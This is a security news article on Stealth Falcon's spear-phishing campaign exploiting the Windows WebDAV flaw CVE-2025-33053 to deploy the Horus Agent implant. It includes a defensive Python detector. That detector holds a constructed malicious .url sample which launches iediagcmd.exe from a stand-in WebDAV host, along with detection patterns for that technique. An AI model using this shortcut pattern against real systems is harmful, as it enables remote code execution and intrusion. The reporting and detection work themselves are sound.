APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware

Posted on June 10, 2025 By CWS

A sophisticated cyberattack campaign by the advanced persistent threat group Stealth Falcon exploited a previously unknown zero-day vulnerability to target a major Turkish defense company and execute malware remotely.

The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools so that they execute malicious files from attacker-controlled WebDAV servers.

Microsoft released a security patch for this vulnerability as part of its June Patch Tuesday updates, following responsible disclosure by Check Point Research.

The vulnerability was exploited via a malicious .url file named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” (Turkish for “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url”), which was likely distributed as an archived attachment in a spear-phishing email targeting the Turkish defense contractor.

The .url file pointed to iediagcmd.exe, a legitimate Internet Explorer diagnostics utility, but set the working directory to an attacker-controlled WebDAV server at “summerartcamp[.]net@ssl@443/DavWWWRootOSYxaOjr”.

This technique exploited the search order used by the .NET Process.Start() method, causing the legitimate tool to execute malicious files from the remote server instead of the system files it expected.

This allowed arbitrary code execution via process hollowing, as the malicious route.exe spawned from the WebDAV server bypassed traditional signature-based defenses.
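As an added illustration (not code from the article or from Check Point), the following script shows how a defender could triage .url shortcuts for the pattern described above: a shortcut launching a local executable while its WorkingDirectory points at a remote WebDAV host. The sample shortcut bodies and the host name are constructed; they are not real indicators.

```python
import re
from configparser import ConfigParser, Error as ConfigError

# WebClient (WebDAV mini-redirector) UNC syntax: \\host[@ssl][@port]\share\...
# "@ssl@443" and a "DavWWWRoot" share are how Windows addresses an HTTP(S) WebDAV
# server, so they are the tell-tale tokens to look for in a WorkingDirectory value.
WEBDAV_UNC = re.compile(
    r"^\\\\(?P<host>[A-Za-z0-9.\-]+)(?P<ssl>@ssl)?(?:@(?P<port>\d+))?\\(?P<share>[^\\]*)",
    re.IGNORECASE,
)

def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys of a .url body (lowercased); {} if absent or malformed."""
    cp = ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except ConfigError:
        return {}
    for name in cp.sections():
        if name.lower() == "internetshortcut":
            return dict(cp[name])
    return {}

def assess_url_shortcut(text: str) -> dict:
    """Flag a .url file whose WorkingDirectory points at a remote WebDAV/UNC host,
    the setup that lets a legitimate local EXE resolve files from an attacker's server."""
    keys = parse_url_file(text)
    url = keys.get("url", "")
    workdir = keys.get("workingdirectory", "")
    findings = []
    m = WEBDAV_UNC.match(workdir)
    if m:
        webdav = bool(m.group("ssl") or m.group("port")) or m.group("share").lower() == "davwwwroot"
        kind = "WebDAV" if webdav else "remote UNC"
        findings.append(f"WorkingDirectory points to {kind} host {m.group('host')}")
    if url.lower().startswith("file:") and url.lower().endswith(".exe"):
        findings.append("URL launches a local executable via file://")
    return {"url": url, "working_directory": workdir, "findings": findings,
            "suspicious": m is not None}

# Constructed samples (hypothetical host, not a real indicator): one mimicking the technique, one benign.
MALICIOUS_SAMPLE = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\webdav-host.invalid@ssl@443\DavWWWRoot\payload_dir
IconIndex=0
"""
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://www.example.org/
IconIndex=0
"""

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, assess_url_shortcut(body))
```

The same check can be pointed at shortcut files extracted from mail attachments or archives; a hit on a WebDAV working directory alongside a file:// executable URL is the combination worth alerting on.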

Certificate for a malicious file (Source: Check Point)

APT Hackers Exploited WebDAV Zero-Day

Stealth Falcon, also known as FruityArmor, is an advanced persistent threat group that has been conducting cyber espionage operations since at least 2012.

The group primarily targets high-profile entities in the Middle East and Africa, with recent operations observed against government and defense sectors in Turkey, Qatar, Egypt, and Yemen.

Infection chain (Source: Check Point)

The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework, according to Check Point Research.

Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant. The malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.

Beyond the initial implant, researchers identified several previously undisclosed custom tools in Stealth Falcon’s arsenal, including a DC Credential Dumper that bypasses file locks by accessing virtual disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a custom keylogger with RC4 encryption.

The Horus Agent focuses on essential reconnaissance functions, allowing threat actors to fingerprint victim machines and assess their value before deploying more advanced payloads. This approach helps protect the group’s sophisticated post-exploitation tools from exposure.

Stealth Falcon consistently uses repurposed legitimate domains purchased through the NameCheap registrar, usually in .net or .com top-level domains. This strategy helps their infrastructure blend in with legitimate traffic, complicating attribution efforts.

The group’s continued evolution demonstrates its commitment to maintaining stealth and resilience in its operations, using commercial code obfuscation tools and custom modifications that make its payloads difficult to reverse-engineer and track over time.

This latest campaign highlights the ongoing threat posed by sophisticated APT groups, which combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.
